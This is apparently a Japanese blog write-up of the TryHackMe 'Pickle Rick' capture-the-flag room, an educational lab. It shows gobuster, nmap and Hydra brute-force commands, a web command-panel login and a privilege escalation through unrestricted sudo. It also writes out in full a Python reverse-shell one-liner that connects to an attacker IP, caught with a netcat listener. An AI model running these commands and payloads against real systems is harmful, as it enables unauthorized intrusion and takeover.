2
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

TryHackMe Writeup: Pickle Rick

Posted at

はじめに

今回は私がTryHackMeの2問目に解いた問題「Pickle Rick」のWriteupを書いていきたいと思います.前回よりかは少し慣れたかなという感じでした.

Task1:Pickle Rick

今回のRoomはタスクが一つしかなく,問題も3問と少ないですが,その分与えられているヒントが少ないものでした.

webサーバーにアクセス

説明文にwebサーバーとあったのでとりあえず該当IPにfirefoxでつないでみます.
Pasted image 20240224140602.png
ここから特に得られる情報はなさそうです.
(後でここにもヒントがあることにも気づきますが…)

ディレクトリ探索(1)

gobuster dir -u 10.10.27.90 -w /usr/share/wordlists/dirb/common.txt -o gobuster_dir.log
Pasted image 20240224141202.png
assetsというディレクトリがあるようですね.

ポートスキャン

sudo nmap -p- -vv -T4 -O -sV 10.10.27.90
Pasted image 20240224140909.png
20番と80番ポートが開いているようです.(SSHとApache)

Hydra

トップページに書いてたBURRRRRRRRPがユーザ名かなと思ったのでブルートフォース試してみます.
hydra -l BURRRRRRRRP -P /usr/share/wordlists/rockyou.txt ssh:10.10.27.90
Pasted image 20240224141704.png
パスワード認証を許可してないみたいですね.

先ほどのディレクトリ探索で明らかになったassetsにアクセスしてみます.
Pasted image 20240224141818.png
一通り見てみたけど特に関係なさそう?

ディレクトリ探索(2)

html,php,txtに絞って探索します.
gobuster dir -u 10.10.27.90 -w /usr/share/wordlists/dirb/common.txt -x html,txt,php -o gobuster_dir_1.log
Pasted image 20240224142937.png
index.htmllogin.phpportal.phpが見つかりました.

login.phpにアクセスしてみます.
Pasted image 20240224143437.png
ログイン画面が出てきました./assetsの中に入っているportal.jpgが読み込まれてるみたいですね.
exiftoolportal.jpgを見てみます.
特にヒントはありませんでした.

robots.txt

Pasted image 20240224144948.png
謎の文字列が出てきました.これがパスワードだったりするんですかね?
先ほどのログインフォームに入力してみます.
ユーザ名:BURRRRRRRRP
パスワード:Wubbalubbadubdub
これではログインできませんでした.
ここで先ほど書いたトップページのページのソースを見てみます.
Pasted image 20240224150054.png
こんなところに書いてたんですね.めちゃくちゃ得られる情報がありました.
これでログインできました.
ユーザ名:R1ckRul3s
パスワード:Wubbalubbadubdub
*他の人のwriteup見てわかったんですけど,ディレクトリ探索の時にwordlist変えたらrobots.txtも出てくるみたいですね.

Reverse Shell

Pasted image 20240224150205.png
Pasted image 20240224150323.png
ここに何かしらのコマンド打てばいいのかな
コマンドパネルが出てくる.それ以外のページは全て許可がないらしい
Pasted image 20240224151904.png
ここにもコメントアウトされてるものがある.
なんかコメントアウトされてるところがある(base64?)
とりあえずこれをcommand panelに入力してみる.
特に変化なしですね.
先ほどのコメントアウトされてるものを10回デコードしてみるとrabbit hole(無駄な時間みたいな意味らしい.ひっかけですかね?)というものが出てきました.

lsコマンド入力してみます.
Pasted image 20240224152121.png
cat Sup3rS3cretPickl3Ingred.txtを試してみましたが,見ることができないみたいです.
Pasted image 20240224152215.png
lessコマンドで見ることができます.これが1問目の答えです.

他に何のコマンドが使えるのか調べてみます.とりあえずpythonを調べてみます.
python3 -c "print('hello world')"
python3は使えるみたいです.ここでpythonのリバースシェルについて調べてみます.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.4.63.195",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
この時,IPアドレスとポートは変更してください.
nc -lnvp 1234で通信を待ち受けます.これでshellが取れました.
Pasted image 20240224154424.png

cat clue.txtで見てみるとLook around the file system for the other ingredient.とのことだったのでfindコマンドで探せばいいんですかね?

find / -name second*
Pasted image 20240224154854.png
/home/rick/second ingredientsにあるようです.catで見る際にはパス部分をダブルクオーテションで囲むようにしましょう.
これで2つ目の答えがわかりました.

Privilege escalation

ダメもとでfindしてみます.
find / -name last
やっぱり無理でしたね.

sudoで実行できるコマンドを調べます.
sudo -l
Pasted image 20240224155532.png
現在のユーザ(www-data)は全てのコマンドをパスワード無しで実行できるようです.
sudo bashでrootに昇格できました.
Pasted image 20240224155624.png
後はrootディレクトリに3rd.txtがあるのでこれで終わりです.

終わりに

以前に解いたRootMeと基本的な流れは同じだったので時間的にも早く解くことができました.
是非そちらの記事も見てみてください.
よろしければ改善点などあればコメントいただけると幸いです.
ありがとうございました.

2
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
2
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?